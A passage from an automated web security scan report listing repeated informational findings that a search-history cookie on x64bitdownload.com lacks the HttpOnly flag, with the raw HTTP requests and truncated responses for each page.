Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85797


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.831. http://www.x64bitdownload.com/64-bit-conference-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-conference-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-conference-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88850


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.832. http://www.x64bitdownload.com/64-bit-cross-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-cross-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-cross-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90500


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.833. http://www.x64bitdownload.com/64-bit-download-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-download-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-download-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94324


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.834. http://www.x64bitdownload.com/64-bit-downloader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-downloader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-downloader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98412


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.835. http://www.x64bitdownload.com/64-bit-explorer-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-explorer-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-explorer-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93074


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.836. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29987


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.837. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-fast-download-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-fast-download-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96343


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.838. http://www.x64bitdownload.com/64-bit-feed-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-feed-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-feed-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.839. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-feedreader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-feedreader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41067


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.840. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-file-grabber-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-file-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.841. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-file-sharing-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-file-sharing-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.842. http://www.x64bitdownload.com/64-bit-firefox-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-firefox-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-firefox-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97672


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.843. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-forum-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33899


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.844. http://www.x64bitdownload.com/64-bit-forum-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forum-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-forum-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:32 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:58 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91001


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.845. http://www.x64bitdownload.com/64-bit-forums-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forums-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-forums-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:40 GMT
Cache-Control: max-age=600
Pragma: cache
